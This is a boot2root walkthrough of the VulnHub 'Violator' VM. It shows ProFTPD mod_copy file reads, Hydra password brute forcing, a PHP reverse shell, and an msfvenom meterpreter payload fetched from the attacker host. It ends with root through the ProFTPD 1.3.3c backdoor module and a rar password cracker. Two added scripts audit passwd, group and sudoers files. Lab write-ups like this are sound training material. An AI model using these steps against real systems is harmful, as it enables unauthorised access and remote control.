A while back knightmare asked me to test his boot2root challenge named Violator. Having thoroughly enjoyed his first three, Droopy, Gibson and Sidney, I jumped at the opportunity.
Like his other VMs it had a theme, this one being Depeche Mode themed.
You can grab a copy for yourself here: https://www.vulnhub.com/entry/violator-1,153/
When testing a boot2root I typically approach it as any other challenge, only stopping along the way if I feel I discover a flaw/unintended path, something appears to be broken or I just 100% hit a wall.
Knightmare provided me with the following hints to get going (I’ve also learned by now to set the HDD on all his VMs to non-persistent 🙂 ) :
- Vince Clarke can help you with the Fast Fashion.
- The challenge isn’t over with root. The flag is something special.
- I have put a few trolls in, but only to sport with you.
Without further ado, here goes:
As always, we start off with a quick nmap scan. This one turns up an FTP service and Apache web server.
root@mrb3n:/# nmap -sV 192.168.110.183

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-09-16 10:13 EDT
Nmap scan report for 192.168.110.183
Host is up (0.00011s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5rc3
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 00:0C:29:7D:C7:3C (VMware)
Service Info: OS: Unix
The web server is pretty sparse. There is an image of Foghorn Leghorn from Looney Tunes as well as a link to a Wikipedia page about the Depeche Mode album ‘Violator’, which I can only assume is a hint for later.
root@mrb3n:~# curl -s http://192.168.110.183
<html>
<title>I Say... I say... I say Boy! You pumpin' for oil or somethin'...?</title>
<body>
<br>I Say.. I say... I say boy! You're barkin up the wrong tree!</br>
<img src="foggie.jpg" alt="foggie.jpg" height=1041" width="731">
<-- https://en.wikipedia.org/wiki/Violator_(album) -->
</body>
</html>
I pulled down the image and checked it with exiftool but did not find any hidden treasures.
Leaving the web server aside and taking a look at the FTP service banner, I find a ProFTPD 1.3.5 File Copy exploit over on exploit-db. Maybe I can use this to pull down something interesting?
I attempt to connect anonymously and get rejected so let’s try out this exploit. If successful, I will be able to use the mod_copy module SITE CPFR/SITE CPTO commands to read/write files remotely and unauthenticated.
root@mrb3n:~# ftp 192.168.110.183
Connected to 192.168.110.183.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:192.168.110.183]
Name (192.168.110.183:root): anonymous
331 Password required for anonymous
Password:
530 Login incorrect.
Login failed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
I go after /etc/passwd first.
ftp> site CPFR /etc/passwd
350 File or directory exists, ready for destination name
ftp> site CPTO /var/www/html/passwd
250 Copy successful
ftp>
Awesome! The web root is writeable and I was able to pull down a list of usernames.
root@mrb3n:~# curl -s http://192.168.110.183/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
dg:x:1000:1000:Dave Gahan,,,:/home/dg:/bin/bash
proftpd:x:104:65534::/var/run/proftpd:/bin/false
ftp:x:105:65534::/srv/ftp:/bin/false
mg:x:1001:1001:Martin Gore:/home/mg:/bin/bash
af:x:1002:1002:Andrew Fletcher:/home/af:/bin/bash
aw:x:1003:1003:Alan Wilder:/home/aw:/bin/bash
So here we have a list of local usernames, which happen to be the members of Depeche Mode. I attempted to grab /etc/shadow but was denied. I grabbed the groups file to see what permissions each user has on the target system.
ftp> site CPFR /etc/group
350 File or directory exists, ready for destination name
ftp> site CPTO /var/www/html/group
250 Copy successful

root@mrb3n:~/violator# curl -s http://192.168.110.183/group > group
root@mrb3n:~/violator# cat group | grep sudo
sudo:x:27:dg
The user dg is in the sudo group, so hopefully we can get his creds somehow! At this point I figured I needed some sort of wordlist. The Wikipedia page linked in the index page source seems like a good candidate. Firing up CeWL, I put together a quick wordlist.
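Reading /etc/passwd and /etc/group by hand works for a handful of users, but the same question (who can actually log in, and who sits in a privileged group such as sudo) comes up in every host review. As an added example that is not part of the original write-up, here is a small parser for both files; the passwd lines are taken from the listing above, while the group sample is constructed (only the sudo line is from the target).

```python
# Added example (not from the original write-up): audit /etc/passwd and /etc/group
# text for login-capable accounts, privileged group membership and extra UID-0 users.

# Passwd lines copied from the listing recovered from the target (abridged).
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
syslog:x:101:104::/home/syslog:/bin/false
dg:x:1000:1000:Dave Gahan,,,:/home/dg:/bin/bash
proftpd:x:104:65534::/var/run/proftpd:/bin/false
mg:x:1001:1001:Martin Gore:/home/mg:/bin/bash
af:x:1002:1002:Andrew Fletcher:/home/af:/bin/bash
aw:x:1003:1003:Alan Wilder:/home/aw:/bin/bash
"""

# Constructed group file: only the sudo line is from the target, the rest is made up.
GROUP_SAMPLE = """\
root:x:0:
adm:x:4:syslog,dg
sudo:x:27:dg
dg:x:1000:
"""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false", ""}
# Groups that grant root-equivalent or otherwise sensitive access on a typical Linux box.
PRIVILEGED_GROUPS = {"sudo", "wheel", "admin", "root", "adm", "docker", "lxd", "disk", "shadow"}


def parse_passwd(text):
    """Return {username: {"uid", "gid", "home", "shell"}} from /etc/passwd text."""
    users = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed line: skip it rather than abort the audit
        name, _, uid, gid, _, home, shell = fields
        users[name] = {"uid": int(uid), "gid": int(gid), "home": home, "shell": shell}
    return users


def parse_group(text):
    """Return {groupname: (gid, set_of_member_names)} from /etc/group text."""
    groups = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 4:
            continue
        name, _, gid, members = fields
        groups[name] = (int(gid), {m for m in members.split(",") if m})
    return groups


def interactive_accounts(users):
    """Accounts whose shell allows an interactive login."""
    return sorted(u for u, info in users.items() if info["shell"] not in NOLOGIN_SHELLS)


def privileged_members(users, groups):
    """Map each user to the privileged groups they hold, via membership or primary GID."""
    gid_to_name = {gid: name for name, (gid, _) in groups.items()}
    result = {}
    for name, (_, members) in groups.items():
        if name in PRIVILEGED_GROUPS:
            for m in members:
                result.setdefault(m, set()).add(name)
    for user, info in users.items():
        primary = gid_to_name.get(info["gid"])
        if primary in PRIVILEGED_GROUPS:
            result.setdefault(user, set()).add(primary)
    return {u: sorted(g) for u, g in result.items()}


def uid_zero_accounts(users):
    """Every UID-0 account; anything besides root here is a classic backdoor indicator."""
    return sorted(u for u, info in users.items() if info["uid"] == 0)


if __name__ == "__main__":
    users = parse_passwd(PASSWD_SAMPLE)
    groups = parse_group(GROUP_SAMPLE)
    print("login-capable:", interactive_accounts(users))
    print("privileged:", privileged_members(users, groups))
    print("uid 0:", uid_zero_accounts(users))
```

On the real files the output is the list of accounts worth protecting with strong credentials first; on Violator it is exactly the four band members plus root, with dg the only sudo member.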
root@mrb3n:~/violator# cewl -v 'en.wikipedia.org/wiki/Violator_(album)' -d 1 -w violator.txt
This wordlist didn't get me anywhere. After some fumbling around with various combinations I settled on a wordlist of all the song titles, lowercase, without spaces or special characters. First we remove all spaces.
root@mrb3n:~/violator# sed 's/ //g' violator > violator_nospaces
We can clean things up a bit more with cut and tr.
root@mrb3n:~/violator# cut -d'"' -f2 violator_nospaces | tr '[:upper:]' '[:lower:]' > violator_list
root@mrb3n:~/violator# cat violator_list
worldinmyeyes
sweetestperfection
personaljesus
halo
waitingforthenight
enjoythesilence
policyoftruth
bluedress
clean
dangerous
memphisto
sibeling
kaleid
happiestgirl
seaofsin
enjoythesilence
enjoythesilence
enjoythesilence
sibeling
enjoythesilence
enjoythesilence
enjoythesilence
memphisto
Interestingly enough, Hydra finds valid passwords for all four users. dg is my target, so let's check his account first.
root@mrb3n:~/violator# hydra -L users -P violator_list ftp://192.168.110.183
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-09-16 14:00:35
[DATA] max 16 tasks per 1 server, overall 64 tasks, 96 login tries (l:4/p:24), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.110.183   login: dg   password: policyoftruth
[21][ftp] host: 192.168.110.183   login: mg   password: bluedress
[21][ftp] host: 192.168.110.183   login: af   password: enjoythesilence
[21][ftp] host: 192.168.110.183   login: aw   password: sweetestperfection
1 of 1 target successfully completed, 4 valid passwords found
Logging in I am in dg’s home directory and am able to change to various other directories, including those for our other 3 users.
root@mrb3n:~# ftp 192.168.110.183
Connected to 192.168.110.183.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:192.168.110.183]
Name (192.168.110.183:root): dg
331 Password required for dg
Password:
230 User dg logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
257 "/home/dg" is the current directory
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x  10 root  root  4096 Jun  6 20:31 bd
226 Transfer complete
ftp> cd ..
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   3 af  af  4096 Jun 12 09:25 af
drwxr-xr-x   2 aw  aw  4096 Jun 12 09:25 aw
drwxr-xr-x   4 dg  dg  4096 Jun 14 18:55 dg
drwxr-xr-x   2 mg  mg  4096 Jun 12 09:28 mg
I pull down various files for inspection locally.
ftp> get minarke-1.21.tar.bz2
local: minarke-1.21.tar.bz2 remote: minarke-1.21.tar.bz2
200 PORT command successful
150 Opening BINARY mode data connection for minarke-1.21.tar.bz2 (15576 bytes)
226 Transfer complete
15576 bytes received in 0.01 secs (2.7953 MB/s)

150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 aw  aw   59 Jun 12 09:19 hint
226 Transfer complete
ftp> get hint
local: hint remote: hint

150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 mg  mg  112 Jun 12 09:28 faith_and_devotion
226 Transfer complete
ftp> get faith_and_devotion
local: faith_and_devotion remote: faith_and_devotion
200 PORT command successful
150 Opening BINARY mode data connection for faith_and_devotion (112 bytes)
226 Transfer complete
dg's home directory contains a more extensive directory listing, which we'll have to come back to later.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 root root 4096 Jun  6 20:31 bin
drwxr-xr-x   2 root root 4096 Jun  6 20:46 etc
drwxr-xr-x   3 root root 4096 Jun  6 20:31 include
drwxr-xr-x   4 root root 4096 Jun  6 20:31 lib
drwxr-xr-x   2 root root 4096 Jun  6 20:31 libexec
drwxr-xr-x   2 root root 4096 Jun  6 20:31 sbin
drwxr-xr-x   4 root root 4096 Jun  6 20:31 share
drwxr-xr-x   2 root root 4096 Jun  6 22:17 var
Taking a look at our loot, the hint file is a bit vague…for now…
root@mrb3n:~/violator# cat hint
You are getting close... Can you crack the final enigma..?
The Minarke archive is interesting: a C file and a Makefile for compiling an Enigma M4 emulator. We know that knightmare is infamous for flag challenges, so I am almost certain this will come into play later.
root@mrb3n:~/violator/minarke-1.21# cat minarke.c
/* Minarke, an Enigma M4 emulator
 *
 * Written by John Gilbert
 * Version 1.21
 * (c) 2008
I compile it and check out the binary. Our suspicions are confirmed: this can be used to crack some Enigma code. Pretty awesome. Now let's find that code!
root@mrb3n:~/violator/minarke-1.21# make
gcc -g -Wall -o minarke minarke.c
root@mrb3n:~/violator/minarke-1.21# ./minarke
Minarke, an Enigma M4 emulator by John Gilbert
Emulates the Kriegsmarine M4 Enigma encryption machine

Initial Setup Notes
Rotors: Reflector (B/C), Thin Rotor (B/G), 3 Rotors (1-8, can't reuse them)
Use BB### or CG### with A### settings to read/create Wehrmacht three rotor traffic
Ring and position settings: A-Z for each of the 4 rotors
Reflector setting is always fixed at A.
Plugboard settings: A-Z,A-Z pairs, also won't allow reuse
Hit return to end input, 11 pairs recomended for maximum security.
Hit ESC at any time to quit.

Special Keys (during input mode)
1: rewind one setting
2: reset position settings
3: new position settings
4: new setup
9: toggle debug
0: show position settings
?: show help

see http://en.wikipedia.org/wiki/Enigma_machine
also http://www.bytereef.org/m4_project.html

Rotors:
The faith_and_devotion file contains what we need to use the Enigma machine once we have the code.
root@mrb3n:~/violator# cat faith_and_devotion
Lyrics:

* Use Wermacht with 3 rotors
* Reflector to B
Initial: A B C
Alphabet Ring: C B A
Plug Board A-B, C-D
Now I need a shell. Since /var/www/html appears to be writeable, I attempt to upload a PHP reverse shell. If all goes well and knightmare doesn't have any tricks up his sleeve, I should be able to grab a nice reverse shell.
root@mrb3n:~# ftp 192.168.110.183
Connected to 192.168.110.183.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:192.168.110.183]
Name (192.168.110.183:root): dg
331 Password required for dg
Password:
230 User dg logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /var/www/html
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 dg      dg      51256 Jun  6 20:00 foggie.jpg
-rw-r--r--   1 proftpd nogroup   699 Sep 16 17:39 group
-rw-rw-r--   1 dg      dg        318 Jun 12 17:26 index.html
-rw-r--r--   1 proftpd nogroup  1330 Sep 16 15:24 passwd
226 Transfer complete
ftp> put /var/www/html/violator.php
local: /var/www/html/violator.php remote: /var/www/html/violator.php
200 PORT command successful
150 Opening BINARY mode data connection for /var/www/html/violator.php
226 Transfer complete
3463 bytes sent in 0.00 secs (33.0257 MB/s)
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 dg      dg      51256 Jun  6 20:00 foggie.jpg
-rw-r--r--   1 proftpd nogroup   699 Sep 16 17:39 group
-rw-rw-r--   1 dg      dg        318 Jun 12 17:26 index.html
-rw-r--r--   1 proftpd nogroup  1330 Sep 16 15:24 passwd
-rw-r--r--   1 dg      dg       3463 Sep 16 18:18 violator.php
226 Transfer complete
I browse to my violator.php reverse shell script and sure enough get a connection as www-data.
root@mrb3n:~/violator# curl -s http://192.168.110.183/violator.php

root@mrb3n:~# nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.110.179] from (UNKNOWN) [192.168.110.183] 33641
Linux violator 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 19:20:09 up  3:00,  0 users,  load average: 0.00, 0.01, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@violator:/$
I su to the dg user and check what he is able to run as root, since I remembered from earlier that he is part of the sudo group. Interesting: he can run another version of proftpd as root, which is what we saw earlier in his home directory.
www-data@violator:/$ su dg
su dg
Password: policyoftruth

dg@violator:/$ sudo -l
sudo -l
Matching Defaults entries for dg on violator:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User dg may run the following commands on violator:
    (ALL) NOPASSWD: /home/dg/bd/sbin/proftpd
dg@violator:~/bd/sbin$ file proftpd
file proftpd
proftpd: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=8abf34e54323fc0bb0320d1ea3750da2e57ecd08, stripped
dg@violator:~/bd/sbin$ sudo ./proftpd
sudo ./proftpd
 - setting default address to 127.0.0.1
localhost - SocketBindTight in effect, ignoring DefaultServer
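The sudo rule above is the textbook risky entry: a NOPASSWD command whose binary lives under the user's own home directory, so whoever owns that account decides what runs as root. As an added example that is not part of the original write-up, here is a small audit script that parses sudoers-style rules and flags that pattern; the sample rules are constructed, with the dg line mirroring the sudo -l output above.

```python
# Added example (not from the original write-up): flag sudoers rules that let a user
# run root commands from a location they control, or without re-authenticating.
import os
import re

# Constructed sample; the dg line mirrors the rule shown by `sudo -l` on Violator.
SUDOERS_SAMPLE = """\
# constructed sample sudoers lines
root    ALL=(ALL:ALL) ALL
dg      ALL=(ALL) NOPASSWD: /home/dg/bd/sbin/proftpd
backup  ALL=(root) /usr/bin/rsync
mg      ALL=(ALL) NOPASSWD: /usr/bin/vim
"""

# Directories an unprivileged user can normally write to: a rule pointing into one of
# them lets the user replace the binary with anything and have sudo run it as root.
USER_WRITABLE_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")
# Editors and interpreters that hand the caller a shell or an arbitrary file write.
SHELL_ESCAPES = {"vim", "vi", "nano", "less", "more", "python", "perl", "bash", "sh", "find", "awk"}

# user  hosts=(runas) [TAG: ...] command[, command...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<hosts>\S+?)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)


def parse_rule(line):
    """Parse one sudoers user specification; return None for lines that are not rules."""
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    tags = {t.strip(":").upper() for t in m.group("tags").split() if t.strip(":")}
    cmds = [c.strip() for c in m.group("cmds").split(",")]
    return {"user": m.group("user"), "runas": m.group("runas"), "tags": tags, "commands": cmds}


def audit_rule(rule, check_fs=False):
    """Return a list of human-readable findings for a parsed rule (empty if it looks fine)."""
    findings = []
    if "NOPASSWD" in rule["tags"]:
        findings.append("NOPASSWD: no re-authentication before running as root")
    for cmd in rule["commands"]:
        if cmd == "ALL":
            continue
        path = cmd.split()[0]
        if path.startswith(USER_WRITABLE_PREFIXES):
            findings.append("%s lives in a user-writable location" % path)
        if os.path.basename(path) in SHELL_ESCAPES:
            findings.append("%s can spawn a shell or write files as root" % path)
        # Optional live check when run on the host itself (off by default so the
        # sample stays deterministic).
        if check_fs and os.path.exists(path) and os.access(path, os.W_OK):
            findings.append("%s is writable by the current user" % path)
    return findings


def audit_sudoers(text, check_fs=False):
    """Audit every rule in sudoers text; returns {user: [findings]} for users with issues."""
    report = {}
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or stripped.startswith("Defaults"):
            continue
        rule = parse_rule(stripped)
        if rule is None:
            continue
        findings = audit_rule(rule, check_fs)
        if findings:
            report.setdefault(rule["user"], []).extend(findings)
    return report


if __name__ == "__main__":
    for user, issues in audit_sudoers(SUDOERS_SAMPLE).items():
        print(user)
        for issue in issues:
            print("  -", issue)
```

The fix on the defending side is the usual one: sudo rules should point at root-owned binaries in root-owned directories, and NOPASSWD should be reserved for commands whose behaviour cannot be redirected by the caller.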
We now have another service running locally on port 2121. How can this be abused to gain root privs?
dg@violator:~/bd/sbin$ netstat -antp
netstat -antp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:2121          0.0.0.0:*               LISTEN      -
tcp        0    218 192.168.110.183:33641   192.168.110.179:443     ESTABLISHED 1391/bash
tcp6       0      0 :::21                   :::*                    LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -
tcp6       0      0 192.168.110.183:80      192.168.110.179:56414   ESTABLISHED -
tcp6       0      0 192.168.110.183:21      192.168.110.179:56886   ESTABLISHED -
Connecting to port 2121 locally, I see we are dealing with ProFTPD 1.3.3c.
dg@violator:~/bd/sbin$ telnet 127.0.0.1 2121
telnet 127.0.0.1 2121
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 ProFTPD 1.3.3c Server (Depeche Mode Violator Server) [127.0.0.1]
This particular ProFTPD version has a known backdoor command execution vulnerability, which hopefully we can use to escalate privileges. There are many ways to do this; the way I did it worked, but of course there are other options.
root@mrb3n:~# searchsploit ProFTPD 1.3.3c
------------------------------------------------- ----------------------------------
 Exploit Title                                   |  Path
                                                 | (/usr/share/exploitdb/platforms)
------------------------------------------------- ----------------------------------
ProFTPD 1.3.3c - Compromised Source Remote Root  | ./linux/remote/15662.txt
ProFTPD-1.3.3c Backdoor Command Execution        | ./linux/remote/16921.rb
It looks like I will need Metasploit to take advantage of this exploit, so I quickly create a meterpreter PHP payload, upload it to the target, execute it and grab a meterpreter shell.
root@mrb3n:/var/www/html# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.110.179 LPORT=8443 -f raw > violator_meterp.php
I could have used FTP to transfer the file, but after seeing that knightmare was kind enough to remove curl and wget I had to find another way.
Connection closed by foreign host.
dg@violator:~/bd/sbin$ wget http://192.168.110.179/violator_meterp.php -O /var/www/html/shell.php
< http://192.168.110.179/violator_meterp.php -O /var/www/html/shell.php
The program 'wget' is currently not installed. You can install it by typing:
sudo apt-get install wget
dg@violator:~/bd/sbin$ curl -O http://192.168.110.179/violator_meterp.php
curl -O http://192.168.110.179/violator_meterp.php
The program 'curl' is currently not installed. You can install it by typing:
sudo apt-get install curl
SCP was still installed so I was able to transfer the file that way, as root which is super secure!
dg@violator:/var/www/html$ scp root@192.168.110.179:/var/www/html/violator_meterp.php .
<scp root@192.168.110.179:/var/www/html/violator_meterp.php .
root@192.168.110.179's password: 🙂
violator_meterp.php                          100%  26KB  25.6KB/s   00:00
Don’t forget to chown the file as dg so we can catch a session as this user.
dg@violator:/var/www/html$ chown dg:dg violator_meterp.php
Quickly set up metasploit to catch our shiny new meterpreter shell.
msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter_reverse_tcp
payload => php/meterpreter_reverse_tcp
msf exploit(handler) > set lhost 192.168.110.179
lhost => 192.168.110.179
msf exploit(handler) > set lport 8443
lport => 8443
Executing the shell I gain a connection, and it's time to set up some port forwarding so I can attack remote port 2121 directly.
dg@violator:/var/www/html$ php violator_meterp.php

msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.110.179:8443
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (192.168.110.179:8443 -> 192.168.110.183:35213) at 2016-09-16 14:50:38 -0400
I use the built-in meterpreter portfwd command to set up the tcp relay.
meterpreter > portfwd add -L 127.0.0.1 -l 2121 -p 2121 -r 127.0.0.1
[*] Local TCP relay created: 127.0.0.1:2121 <-> 127.0.0.1:2121
Searching in metasploit I quickly find the exploit I’m looking for and configure it based on our port forwarding rule.
msf exploit(handler) > search ProFTPD

Matching Modules
================

   Name                                         Disclosure Date  Rank       Description
   ----                                         ---------------  ----       -----------
   exploit/freebsd/ftp/proftp_telnet_iac        2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
   exploit/linux/ftp/proftp_sreplace            2006-11-26       great      ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
   exploit/linux/ftp/proftp_telnet_iac          2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
   exploit/linux/misc/netsupport_manager_agent  2011-01-08       average    NetSupport Manager Agent Remote Buffer Overflow
   exploit/unix/ftp/proftpd_133c_backdoor       2010-12-02       excellent  ProFTPD-1.3.3c Backdoor Command Execution
   exploit/unix/ftp/proftpd_modcopy_exec        2015-04-22       excellent  ProFTPD 1.3.5 Mod_Copy Command Execution
msf exploit(proftpd_133c_backdoor) > use cmd/unix/reverse_perl
msf payload(reverse_perl) > show options

Module options (payload/cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port

msf payload(reverse_perl) > set LHOST 192.168.110.179
LHOST => 192.168.110.179
msf payload(reverse_perl) > exploit
[-] Unknown command: exploit.
msf payload(reverse_perl) > use exploit/unix/ftp/proftpd_133c_backdoor
msf exploit(proftpd_133c_backdoor) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf exploit(proftpd_133c_backdoor) > set LHOST 192.168.110.179
LHOST => 192.168.110.179
I run the exploit and pop a root shell.
msf exploit(proftpd_133c_backdoor) > exploit

[*] Started reverse TCP handler on 192.168.110.179:4444
[*] Sending Backdoor Command
[*] Command shell session 6 opened (192.168.110.179:4444 -> 192.168.110.183:44484) at 2016-09-16 15:59:57 -0400

id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
python -c 'import pty;pty.spawn("/bin/bash")'
root@violator:/#
Checking for our flag, as I expected, was a troll 🙂
root@violator:/root# cat flag.txt
cat flag.txt
I say... I say... I say boy! Pumping for oil or something...?

---Foghorn Leghorn "A Broken Leghorn" 1950 (C) W.B.
The hidden directory ‘basildon’ in the root directory contains a file, crocs.rar.
root@violator:/root# ls -lah
ls -lah
total 24K
drwx------  3 root root 4.0K Jun 14 19:56 .
drwxr-xr-x 22 root root 4.0K Jun 14 19:44 ..
-rw-r--r--  1 root root 3.1K Feb 20  2014 .bashrc
d--x------  2 root root 4.0K Jun 14 19:57 .basildon
-rw-r--r--  1 root root  114 Jun 12 10:22 flag.txt
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
root@violator:/root# cd .basildon
cd .basildon
root@violator:/root/.basildon# ls -lah
ls -lah
total 148K
d--x------ 2 root root 4.0K Jun 14 19:57 .
drwx------ 3 root root 4.0K Jun 14 19:56 ..
-rw-r--r-- 1 root root 138K Jun 12 14:46 crocs.rar
I move the file over to the web root and pull it down locally for analysis.
root@mrb3n:~/violator# curl -O http://192.168.110.183/crocs.rar
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  137k  100  137k    0     0  20.6M      0 --:--:-- --:--:-- --:--:-- 22.3M
root@mrb3n:~/violator# file crocs.rar
crocs.rar: RAR archive data, v1d, os: Win32
root@mrb3n:~/violator# unrar e crocs.rar

UNRAR 5.21 freeware      Copyright (c) 1993-2015 Alexander Roshal

Extracting from crocs.rar

Enter password (will not be echoed) for artwork.jpg:
Hmm, a password protected rar containing an image file. I was stuck here for a while. First I used CeWL to create a wordlist based on our original Wikipedia page but had no luck. I then ran the earlier song list without spaces that got us our user accounts, and still no luck. Combining everything I had and using a quick rar brute force Python script, I got a result.
#!/usr/bin/python
import rarfile
import subprocess

subprocess.call('clear', shell=True)
print("Rar file password brute forcer\n")

# The archive to open and the combined candidate list built above, one password per line.
rFile = rarfile.RarFile('crocs.rar')
PassFile = open('violator_songs')

for line in PassFile.readlines():
    password = line.strip('\n')
    try:
        # extractall() raises on a wrong password, so reaching the print means a hit.
        rFile.extractall(pwd=password)
        print('Correct Password = ' + password + '\n')
        exit(0)
    except Exception:
        pass
Our password, and the artwork.jpg file!
root@mrb3n:~/violator# python rarcracker.py
Rar file password brute forcer

Correct Password = World in My Eyes
This time exiftool gave us something juicy, which I believe is our Enigma code.
root@mrb3n:~/violator# wine /root/Desktop/exiftool.exe artwork.jpg
ExifTool Version Number         : 10.07
File Name                       : artwork.jpg
Directory                       : .
File Size                       : 183 kB
File Modification Date/Time     : 2016:06:12 14:38:12-04:00
File Access Date/Time           : 2016:09:16 21:03:34-04:00
File Creation Date/Time         : 2016:06:12 14:38:12-04:00
File Permissions                : rw-rw-rw-
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 300
Y Resolution                    : 300
Exif Byte Order                 : Big-endian (Motorola, MM)
Image Description               : Violator
Software                        : Google
Artist                          : Dave Gaham
Copyright                       : UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI
Exif Version                    : 0220
Date/Time Original              : 1990:03:19 22:13:30
Create Date                     : 1990:03:19 22:13:30
Sub Sec Time Original           : 04
Sub Sec Time Digitized          : 04
Exif Image Width                : 1450
Exif Image Height               : 1450
XP Title                        : Violator
XP Author                       : Dave Gaham
XP Keywords                     : created by user dg
XP Subject                      : policyoftruth
Padding                         : (Binary data 1590 bytes, use -b option to extract)
